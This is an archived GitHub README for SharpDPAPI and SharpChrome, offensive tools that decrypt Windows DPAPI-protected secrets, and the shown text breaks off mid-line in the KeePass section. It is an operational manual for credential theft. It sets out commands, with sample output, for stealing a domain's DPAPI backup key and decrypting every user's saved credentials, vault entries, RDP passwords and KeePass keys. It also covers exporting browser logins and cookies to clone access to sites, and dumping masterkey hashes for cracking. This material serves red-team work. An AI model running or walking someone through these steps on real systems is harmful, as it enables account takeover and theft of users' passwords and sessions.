{
	"id": "ff0ef7e1-4d27-4fc6-a265-0dd3c0416f3d",
	"created_at": "2026-04-06T00:11:06.85469Z",
	"updated_at": "2026-04-10T03:36:48.445008Z",
	"deleted_at": null,
	"sha1_hash": "b284a0a525992ee7cc41d5392553dc1c24ffc2e0",
	"title": "GitHub - GhostPack/SharpDPAPI: SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 277150,
	"plain_text": "GitHub - GhostPack/SharpDPAPI: SharpDPAPI is a C# port of\r\nsome Mimikatz DPAPI functionality.\r\nBy leechristensen\r\nArchived: 2026-04-05 17:06:21 UTC\r\nSharpDPAPI is a C# port of some DPAPI functionality from @gentilkiwi's Mimikatz project.\r\nI did not come up with this logic, it is simply a port from Mimikatz in order to better understand the\r\nprocess and operationalize it to fit our workflow.\r\nThe SharpChrome subproject is an adaptation of work from @gentilkiwi and @djhohnstein, specifically his\r\nSharpChrome project. However, this version of SharpChrome uses a different version of the C# SQL library that\r\nsupports lockless opening. SharpChrome is built as a separate project in SharpDPAPI because of the size of the\r\nSQLite library utilized.\r\nBoth Chrome and newer Chromium-based Edge browsers can be triaged with SharpChrome.\r\nSharpChrome also uses an minimized version of @AArnott's BCrypt P/Invoke code released under the MIT\r\nLicense.\r\nIf you're unfamiliar with DPAPI, check out this post for more background information. 
For more information on\r\nCredentials and Vaults in regards to DPAPI, check out Benjamin's wiki entry on the subject.\r\n@harmj0y is the primary author of this port.\r\nSharpDPAPI is licensed under the BSD 3-Clause license.\r\nTable of Contents\r\nSharpDPAPI\r\nTable of Contents\r\nBackground\r\nSharpDPAPI Command Line Usage\r\nSharpChrome Command Line Usage\r\nOperational Usage\r\nSharpDPAPI\r\nSharpChrome\r\nSharpDPAPI Commands\r\nUser Triage\r\nmasterkeys\r\ncredentials\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 1 of 35\n\nvaults\r\nrdg\r\nkeepass\r\ncertificates\r\ntriage\r\nMachine Triage\r\nmachinemasterkeys\r\nmachinecredentials\r\nmachinevaults\r\ncertificates /machine\r\nmachinetriage\r\nMisc\r\nps\r\nblob\r\nbackupkey\r\nsearch\r\nSCCM\r\nSharpChrome Commands\r\nlogins\r\ncookies\r\nstatekeys\r\nbackupkey\r\nCompile Instructions\r\nTargeting other .NET versions\r\nSidenote: Running SharpDPAPI Through PowerShell\r\nSidenote Sidenote: Running SharpDPAPI Over PSRemoting\r\nBackground\r\nSharpDPAPI Command Line Usage\r\n __ _ _ _ ___\r\n (_ |_ _. 
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.20.0\r\nRetrieve a domain controller's DPAPI backup key, optionally specifying a DC and output file:\r\n SharpDPAPI backupkey [/nowrap] [/server:SERVER.domain] [/file:key.pvk]\r\nThe *search* command will search for potential DPAPI blobs in the registry, files, folders, and base64 blobs:\r\n search /type:registry [/path:HKLM\\path\\to\\key] [/showErrors]\r\n search /type:folder /path:C:\\path\\to\\folder [/maxBytes:\u003cnumOfBytes\u003e] [/showErrors]\r\n search /type:file /path:C:\\path\\to\\file [/maxBytes:\u003cnumOfBytes\u003e]\r\n search /type:base64 [/base:\u003cbase64 string\u003e]\r\nMachine/SYSTEM Triage:\r\n machinemasterkeys - triage all reachable machine masterkey files (elevates to SYSTEM to retrieve the\r\n machinecredentials - use 'machinemasterkeys' and then triage machine Credential files\r\n machinevaults - use 'machinemasterkeys' and then triage machine Vaults\r\n machinetriage - run the 'machinecredentials' and 'machinevaults' commands\r\nUser Triage:\r\n Arguments for the 'masterkeys' command:\r\n /target:FILE/folder - triage a specific masterkey, or a folder full of masterkeys (otherwise triag\r\n /pvk:BASE64... 
- use a base64'ed DPAPI domain private key file to first decrypt reachable use\r\n /pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterke\r\n /password:X - decrypt the target user's masterkeys using a plaintext password (works remot\r\n /ntlm:X - decrypt the target user's masterkeys using a NTLM hash (works remotely)\r\n /credkey:X - decrypt the target user's masterkeys using a DPAPI credkey (domain or local\r\n /rpc - decrypt the target user's masterkeys by asking domain controller to do so\r\n /server:SERVER - triage a remote server, assuming admin access\r\n /hashes - output usermasterkey file 'hashes' in JTR/Hashcat format (no decryption)\r\n Arguments for the credentials|vaults|rdg|keepass|triage|blob|ps commands:\r\n Decryption:\r\n /unprotect - force use of CryptUnprotectData() for 'ps', 'rdg', or 'blob' commands\r\n /pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable use\r\n /pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterke\r\n /password:X - decrypt the target user's masterkeys using a plaintext password (works remot\r\n /ntlm:X - decrypt the target user's masterkeys using a NTLM hash (works remotely)\r\n /credkey:X - decrypt the target user's masterkeys using a DPAPI credkey (domain or local\r\n /rpc - decrypt the target user's masterkeys by asking domain controller to do so\r\n GUID1:SHA1 ... 
- use one or more GUID:SHA1 masterkeys for decryption\r\n /mkfile:FILE - use a file of one or more GUID:SHA1 masterkeys for decryption\r\n Targeting:\r\n /target:FILE/folder - triage a specific 'Credentials','.rdg|RDCMan.settings', 'blob', or 'ps' file\r\n /server:SERVER - triage a remote server, assuming admin access\r\n Note: must use with /pvk:KEY or /password:X\r\n Note: not applicable to 'blob' or 'ps' commands\r\nCertificate Triage:\r\n Arguments for the 'certificates' command:\r\n /showall - show all decrypted private key files, not just ones\r\n /machine - use the local machine store for certificate triage\r\n /mkfile | /target - for /machine triage\r\n [all decryption args from User Triage above]\r\nNote: in most cases, just use *triage* if you're targeting user DPAPI secrets and *machinetriage* if you're goin\r\n These functions wrap all the other applicable functions that can be automatically run.\r\nSharpChrome Command Line Usage\r\n __ _\r\n (_ |_ _. ._ ._ / |_ ._ _ ._ _ _\r\n __) | | (_| | |_) \\_ | | | (_) | | | (/_\r\n |\r\n v1.9.0\r\nRetrieve a domain controller's DPAPI backup key, optionally specifying a DC and output file:\r\n SharpChrome backupkey [/nowrap] [/server:SERVER.domain] [/file:key.pvk]\r\nGlobal arguments for the 'cookies', 'logins', and 'statekeys' commands:\r\n Decryption:\r\n /unprotect - force use of CryptUnprotectData() (default for unprivileged execution)\r\n /pvk:BASE64... 
- use a base64'ed DPAPI domain private key file to first decrypt reachable user ma\r\n /pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys\r\n /password:X - decrypt the target user's masterkeys using a plaintext password (works remotely)\r\n /ntlm:X - decrypt the target user's masterkeys using a NTLM hash (works remotely)\r\n /prekey:X - decrypt the target user's masterkeys using a DPAPI prekey (domain or local SHA1,\r\n /rpc - decrypt the target user's masterkeys by asking domain controller to do so\r\n GUID1:SHA1 ... - use one or more GUID:SHA1 masterkeys for decryption\r\n /statekey:X - a decrypted AES state key (from the 'statekey' command)\r\n Targeting:\r\n /target:FILE - triage a specific 'Cookies', 'Login Data', or 'Local State' file location\r\n /target:C:\\Users\\X\\ - triage a specific user folder for any specified command\r\n /server:SERVER - triage a remote server, assuming admin access (note: must use with /pvk:KEY)\r\n /browser:X - triage 'chrome' (default), (chromium-based) 'edge', or 'slack'\r\n Output:\r\n /format:X - either 'csv' (default) or 'table' display\r\n /showall - show Login Data entries with null passwords and expired Cookies instead of filte\r\n /consoleoutfile:X - output all console output to a file on disk\r\n'cookies' command specific arguments:\r\n /cookie:\"REGEX\" - only return cookies where the cookie name matches the supplied regex\r\n /url:\"REGEX\" - only return cookies where the cookie URL matches the supplied regex\r\n /format:json - output cookie values in an EditThisCookie JSON import format. 
Best when used wit\r\n /setneverexpire - set expirations for cookies output to now + 100 years (for json output)\r\nOperational Usage\r\nSharpDPAPI\r\nOne of the goals with SharpDPAPI is to operationalize Benjamin's DPAPI work in a way that fits with our\r\nworkflow.\r\nHow exactly you use the toolset will depend on what phase of an engagement you're in. In general this breaks into\r\n\"have I compromised the domain or not\".\r\nIf domain admin (or equivalent) privileges have been obtained, the domain DPAPI backup key can be retrieved\r\nwith the backupkey command (or with Mimikatz). This domain private key never changes, and can decrypt any\r\nDPAPI masterkeys for domain users. This means, given a domain DPAPI backup key, an attacker can decrypt\r\nmasterkeys for any domain user that can then be used to decrypt any Vault/Credentials/Chrome Logins/other\r\nDPAPI blobs/etc. The key retrieved from the backupkey command can be used with the masterkeys, credentials,\r\nvaults, rdg, or triage commands.\r\nIf DA privileges have not been achieved, using Mimikatz' sekurlsa::dpapi command will retrieve DPAPI\r\nmasterkey {GUID}:SHA1 mappings of any loaded master keys (user and SYSTEM) on a given system (tip:\r\nrunning dpapi::cache after key extraction will give you a nice table). If you change these keys to a\r\n{GUID1}:SHA1 {GUID2}:SHA1... type format, they can be supplied to the credentials, vaults, rdg, or triage\r\ncommands. This lets you triage all Credential files/Vaults on a system for any user who's currently logged in,\r\nwithout having to do file-by-file decrypts.\r\nAlternatively, you can supply a target user's password, NTLM hash, or DPAPI prekey to the user commands with\r\n/password:X , /ntlm:X , or /prekey:X respectively. 
The dpapi field of Mimikatz' sekurlsa::msv output for\r\ndomain users can be used as the /prekey , while the sha1 field of sekurlsa::msv output can be used as the\r\n/prekey for local users.\r\nFor decrypting RDG/RDCMan.settings files with the rdg command, the /unprotect flag will use\r\nCryptUnprotectData() to decrypt any saved RDP passwords, if the command is run from the user context who\r\nsaved the passwords. This can be done from an unprivileged context, without the need to touch LSASS. For why\r\nthis approach isn't used for credentials/vaults, see Benjamin's documentation here.\r\nFor machine-specific DPAPI triage, the machinemasterkeys|machinecredentials|machinevaults|machinetriage\r\ncommands will do the machine equivalent of user DPAPI triage. If in an elevated context (that is, you need local\r\nadministrative rights), SharpDPAPI will elevate to SYSTEM privileges to retrieve the \"DPAPI_SYSTEM\" LSA\r\nsecret, which is then used to decrypt any discovered machine DPAPI masterkeys. These keys are then used as\r\nlookup tables for machine credentials/vaults/etc.\r\nFor more offensive DPAPI information, check here.\r\nSharpChrome\r\nSharpChrome is a Chrome-specific implementation of SharpDPAPI capable of cookies and logins\r\ndecryption/triage. It is built as a separate project in SharpDPAPI because of the size of the SQLite library utilized.\r\nSince Chrome Cookies/Login Data are saved without CRYPTPROTECT_SYSTEM, CryptUnprotectData() is\r\nback on the table. If SharpChrome is run from an unelevated context, it will attempt to decrypt any logins/cookies\r\nfor the current user using CryptUnprotectData(). A /pvk:[BASE64|file.pvk] , {GUID}:SHA1 lookup table,\r\n/password:X , /ntlm:X , /prekey:X , or /mkfile:FILE of {GUID}:SHA1 values can also be used to decrypt\r\nvalues. 
Also, the C# SQL library used (with a few modifications) supports lockless opening, meaning that Chrome\r\ndoes not have to be closed/target files do not have to be copied to another location.\r\nAlternatively, you can supply a target user's password, NTLM hash, or DPAPI prekey to the user commands with\r\n/password:X , /ntlm:X , or /prekey:X respectively. The dpapi field of Mimikatz' sekurlsa::msv output for\r\ndomain users can be used as the /prekey , while the sha1 field of sekurlsa::msv output can be used as the\r\n/prekey for local users.\r\nIf Chrome is version 80+, an AES state key is stored in AppData\\Local\\Google\\Chrome\\User Data\\Local State -\r\nthis key is protected with DPAPI, so we can use CryptUnprotectData()/pvk/masterkey lookup tables to decrypt it.\r\nThis AES key is then used to protect new cookie and login data entries. This is also the process when\r\n/browser:edge or /browser:brave is specified, for newer Chromium-based Edge browser triage.\r\nBy default, cookies and logins are displayed as a csv - this can be changed with /format:table for table output,\r\nand /format:json for cookies specifically. The json option outputs cookies in a json format that can be imported\r\ninto the EditThisCookie Chrome extension for easy reuse.\r\nThe cookies command also has /cookie:REGEX and /url:REGEX arguments to only return cookie names or urls\r\nmatching the supplied regex. This is useful with /format:json to easily clone access to specific sites.\r\nSpecific cookies/logins/statekey files can be specified with /target:X , and a user folder can be specified with\r\n/target:C:\\Users\\USER\\ for any triage command.\r\nSharpDPAPI Commands\r\nUser Triage\r\nmasterkeys\r\nThe masterkeys command will search for any readable user masterkey files and decrypt them using a supplied\r\ndomain DPAPI backup key. 
It will return a set of masterkey {GUID}:SHA1 mappings.\r\n/password:X can be used to decrypt a user's current masterkeys. Note that for domain-joined machines, the\r\npassword can be supplied in either plaintext or NTLM format. If /target is also supplied with /password , the\r\n/sid:X full domain SID of the user also needs to be specified.\r\nThe domain backup key can be in base64 form ( /pvk:BASE64... ) or file form ( /pvk:key.pvk ).\r\nC:\\Temp\u003eSharpDPAPI.exe masterkeys /pvk:key.pvk\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: Triage User Masterkey Files\r\n[*] Found MasterKey : C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1473254003-2681465353-4059813368\r\n[*] Found MasterKey : C:\\Users\\harmj0y\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-883232822-274137685-4173207997\r\n...(snip)...\r\n[*] User master key cache:\r\n{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316...(snip)...\r\n...(snip)...\r\nIf no /password or /pvk is specified, you may pass the /hashes flag to dump the master key hashes in\r\nJohn/Hashcat format. In this mode, the hashes are printed in the format of {GUID}:DPAPImk .\r\nThe Preferred key is also parsed in order to highlight the current preferred master key, so that effort is not spent\r\ncracking older keys.\r\nC:\\Temp\u003eSharpDPAPI.exe masterkeys /hashes\r\n __ _ _ _ ___\r\n (_ |_ _. 
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.11.3\r\n[*] Action: User DPAPI Masterkey File Triage\r\n[*] Will dump user masterkey hashes\r\n[*] Found MasterKey : C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1473254003-2681465353-4059813368\r\n[*] Found MasterKey : C:\\Users\\harmj0y\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-883232822-274137685-4173207997\r\n...(snip)...\r\n[*] Preferred master keys:\r\nC:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1473254003-2681465353-4059813368-1000\\28678d89-678a-40\r\nC:\\Users\\harmj0y\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-883232822-274137685-4173207997-1111\\3858b304-37e5-48\r\n[*] User master key hashes:\r\n{42e95117-ff5f-40fa-a6fc-87584758a479}:$DPAPImk$1*3*S-1-5-21-1473254003-2681465353-4059813368-1000*des3*sha1*180\r\ncredentials\r\nThe credentials command will search for Credential files and either a) decrypt them with any \"{GUID}:SHA1\"\r\nmasterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied\r\nDPAPI domain backup key ( /pvk:BASE64... or /pvk:key.pvk ) to first decrypt any user masterkeys (a la\r\nmasterkeys), or d) a /password:X to decrypt any user masterkeys, which are then used as a lookup decryption\r\ntable. 
DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command.\r\nA specific credential file (or folder of credentials) can be specified with /target:FILE or /target:C:\\Folder\\ .\r\nIf a file is specified, {GUID}:SHA1 values are required, and if a folder is specified either a) {GUID}:SHA1\r\nvalues must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be\r\nsupplied.\r\nIf run from an elevated context, Credential files for ALL users will be triaged, otherwise only Credential files for\r\nthe current user will be processed.\r\nUsing domain {GUID}:SHA1 masterkey mappings:\r\nC:\\Temp\u003eSharpDPAPI.exe credentials {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687...(snip)... {fe\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: User DPAPI Credential Triage\r\n[*] Triaging Credentials for ALL users\r\nFolder : C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Credentials\\\r\n CredFile : 48C08A704ADBA03A93CD7EC5B77C0EAB\r\n guidMasterKey : {885342c6-028b-4ecf-82b2-304242e769e0}\r\n size : 436\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32772/26115\r\n description : Local Credential Data\r\n LastWritten : 1/22/2019 2:44:40 AM\r\n TargetName : Domain:target=TERMSRV/10.4.10.101\r\n TargetAlias :\r\n Comment :\r\n UserName : DOMAIN\\user\r\n Credential : Password!\r\n ...(snip)...\r\nUsing a domain DPAPI backup key to first decrypt any discoverable masterkeys:\r\nC:\\Temp\u003eSharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. 
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: User DPAPI Credential Triage\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665\r\n...(snip)...\r\n[*] Triaging Credentials for ALL users\r\nFolder : C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Credentials\\\r\n CredFile : 48C08A704ADBA03A93CD7EC5B77C0EAB\r\n guidMasterKey : {885342c6-028b-4ecf-82b2-304242e769e0}\r\n size : 436\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32772/26115\r\n description : Local Credential Data\r\n LastWritten : 1/22/2019 2:44:40 AM\r\n TargetName : Domain:target=TERMSRV/10.4.10.101\r\n TargetAlias :\r\n Comment :\r\n UserName : DOMAIN\\user\r\n Credential : Password!\r\n...(snip)...\r\nvaults\r\nThe vaults command will search for Vaults and either a) decrypt them with any \"{GUID}:SHA1\" masterkeys\r\npassed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain\r\nbackup key ( /pvk:BASE64... or /pvk:key.pvk ) to first decrypt any user masterkeys (a la masterkeys), or d) a\r\n/password:X to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID\r\nmappings can be recovered with Mimikatz' sekurlsa::dpapi command.\r\nThe Policy.vpol folder in the Vault folder is decrypted with any supplied DPAPI keys to retrieve the associated\r\nAES decryption keys, which are then used to decrypt any associated .vcrd files.\r\nA specific vault folder can be specified with /target:C:\\Folder\\ . 
In this case, either a) {GUID}:SHA1 values\r\nmust be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be\r\nsupplied.\r\nUsing domain {GUID}:SHA1 masterkey mappings:\r\nC:\\Temp\u003eSharpDPAPI.exe vaults {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687...(snip)... {feef7b2\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: User DPAPI Vault Triage\r\n[*] Triaging Vaults for ALL users\r\n[*] Triaging Vault folder: C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\r\n VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28\r\n Name : Web Credentials\r\n guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}\r\n size : 240\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32772/26115\r\n description :\r\n aes128 key : EDB42294C0721F2F1638A40F0CD67CD8\r\n aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793\r\n LastWritten : 10/12/2018 12:10:42 PM\r\n FriendlyName : Internet Explorer\r\n Identity : admin\r\n Resource : https://10.0.0.1/\r\n Authenticator : Password!\r\n...(snip)...\r\nUsing a domain DPAPI backup key to first decrypt any discoverable masterkeys:\r\nC:\\Temp\u003eSharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. 
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: DPAPI Vault Triage\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665\r\n...(snip)...\r\n[*] Triaging Vaults for ALL users\r\n[*] Triaging Vault folder: C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\r\n VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28\r\n Name : Web Credentials\r\n guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}\r\n size : 240\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32772/26115\r\n description :\r\n aes128 key : EDB42294C0721F2F1638A40F0CD67CD8\r\n aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793\r\n LastWritten : 10/12/2018 12:10:42 PM\r\n FriendlyName : Internet Explorer\r\n Identity : admin\r\n Resource : https://10.0.0.1/\r\n Authenticator : Password!\r\n...(snip)...\r\nUsing a domain DPAPI backup key with a folder specified (i.e. \"offline\" triage):\r\nC:\\Temp\u003eSharpDPAPI.exe vaults /target:C:\\Temp\\test\\ /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. 
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: User DPAPI Vault Triage\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665\r\n...(snip)...\r\n[*] Target Vault Folder: C:\\Temp\\test\\\r\n[*] Triaging Vault folder: C:\\Temp\\test\\\r\n VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28\r\n Name : Web Credentials\r\n guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}\r\n size : 240\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32772/26115\r\n description :\r\n aes128 key : EDB42294C0721F2F1638A40F0CD67CD8\r\n aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793\r\n LastWritten : 3/20/2019 6:03:50 AM\r\n FriendlyName : Internet Explorer\r\n Identity : account\r\n Resource : http://www.abc.com/\r\n Authenticator : password\r\nrdg\r\nThe rdg command will search for RDCMan.settings files for the current user (or if elevated, all users) and either\r\na) decrypt them with any \"{GUID}:SHA1\" masterkeys passed, b) a /mkfile:FILE of one or more\r\n{GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key ( /pvk:BASE64... or\r\n/pvk:key.pvk ) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user\r\nmasterkeys which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nThe /unprotect flag will use CryptUnprotectData() to decrypt any saved RDP passwords, if the command is run\r\nfrom the user context who saved the passwords. This can be done from an unprivileged context, without the need\r\nto touch LSASS. 
For why this approach isn't used for credentials/vaults, see Benjamin's documentation here.\r\nA specific RDCMan.settings file, .RDC file (or folder of .RDG files) can be specified with /target:FILE or\r\n/target:C:\\Folder\\ . If a file is specified, {GUID}:SHA1 values (or /unprotect ) are required, and if a folder\r\nis specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and\r\na /pvk domain backup key must be supplied.\r\nThis command will decrypt any saved password information from both the RDCMan.settings file and any .RDG\r\nfiles referenced by the RDCMan.settings file.\r\nUsing /unprotect to decrypt any found passwords:\r\nC:\\Temp\u003eSharpDPAPI.exe rdg /unprotect\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.3.0\r\n[*] Action: RDG Triage\r\n[*] Using CryptUnprotectData() to decrypt RDG passwords\r\n[*] Triaging RDCMan Settings Files for current user\r\n RDCManFile : C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings\r\n Accessed : 5/9/2019 11:52:58 AM\r\n Modified : 5/9/2019 11:52:58 AM\r\n Recent Server : test\\primary.testlab.local\r\n Cred Profiles\r\n Profile Name : testprofile\r\n UserName : testlab.local\\dfm\r\n Password : Password123!\r\n Default Logon Credentials\r\n Profile Name : Custom\r\n UserName : TESTLAB\\harmj0y\r\n Password : Password123!\r\n C:\\Users\\harmj0y\\Documents\\test.rdg\r\n Servers\r\n Name : secondary.testlab.local\r\n Name : primary.testlab.local\r\n Profile Name : Custom\r\n UserName : TESTLAB\\dfm.a\r\n Password : Password123!\r\nUsing domain {GUID}:SHA1 masterkey mappings:\r\nC:\\Temp\u003eSharpDPAPI.exe rdg {8abc35b1-b718-4a86-9781-7fd7f37101dd}:ae349cdd3a230f5e04f70fd02be69e2e71f1b017\r\n __ _ _ _ ___\r\n (_ |_ _. 
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.3.0\r\n[*] Action: RDG Triage\r\n[*] Using CryptUnprotectData() to decrypt RDG passwords\r\n[*] Triaging RDCMan Settings Files for current user\r\n RDCManFile : C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings\r\n Accessed : 5/9/2019 11:52:58 AM\r\n Modified : 5/9/2019 11:52:58 AM\r\n Recent Server : test\\primary.testlab.local\r\n Cred Profiles\r\n Profile Name : testprofile\r\n UserName : testlab.local\\dfm\r\n Password : Password123!\r\n Default Logon Credentials\r\n Profile Name : Custom\r\n UserName : TESTLAB\\harmj0y\r\n Password : Password123!\r\n C:\\Users\\harmj0y\\Documents\\test.rdg\r\n Servers\r\n Name : secondary.testlab.local\r\n Name : primary.testlab.local\r\n Profile Name : Custom\r\n UserName : TESTLAB\\dfm.a\r\n Password : Password123!\r\nUsing a domain DPAPI backup key to first decrypt any discoverable masterkeys:\r\nC:\\Temp\u003eSharpDPAPI.exe rdg /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. 
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.3.0\r\n[*] Action: RDG Triage\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665\r\n...(snip)...\r\n[*] Triaging RDCMan.settings Files for ALL users\r\n RDCManFile : C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings\r\n Accessed : 5/9/2019 11:52:58 AM\r\n Modified : 5/9/2019 11:52:58 AM\r\n Recent Server : test\\primary.testlab.local\r\n Cred Profiles\r\n Profile Name : testprofile\r\n UserName : testlab.local\\dfm.a\r\n Password : Password123!\r\n Default Logon Credentials\r\n Profile Name : Custom\r\n UserName : TESTLAB\\harmj0y\r\n Password : Password123!\r\n C:\\Users\\harmj0y\\Documents\\test.rdg\r\n Servers\r\n Name : secondary.testlab.local\r\n Name : primary.testlab.local\r\n Profile Name : Custom\r\n UserName : TESTLAB\\dfm.a\r\n Password : Password123!\r\nkeepass\r\nThe keepass command will search for KeePass ProtectedUserKey.bin files for the current user (or if elevated, all\r\nusers) and either a) decrypt them with any \"{GUID}:SHA1\" masterkeys passed, b) a /mkfile:FILE of one or\r\nmore {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key ( /pvk:BASE64... or\r\n/pvk:key.pvk ) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user\r\nmasterkeys which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nThe /unprotect flag will use CryptUnprotectData() to decrypt the key bytes, if the command is run from the\r\nuser context who saved the passwords. 
This can be done from an unprivileged context, without the need to touch\r\nLSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here.\r\nA specific ProtectedUserKey.bin file, .RDC file (or folder of .RDG files) can be specified with /target:FILE or\r\n/target:C:\\Folder\\ . If a file is specified, {GUID}:SHA1 values (or /unprotect ) are required, and if a folder\r\nis specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and\r\na /pvk domain backup key must be supplied.\r\nDecrypted key file bytes can be used with the modified KeePass version in KeeThief.\r\nUsing /unprotect to decrypt any found key material:\r\nC:\\Temp\u003e SharpDPAPI.exe keepass /unprotect\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.10.0\r\n[*] Action: KeePass Triage\r\n[*] Using CryptUnprotectData() for decryption.\r\n[*] Triaging KeePass ProtectedUserKey.bin files for current user\r\n File : C:\\Users\\harmj0y\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\r\n Accessed 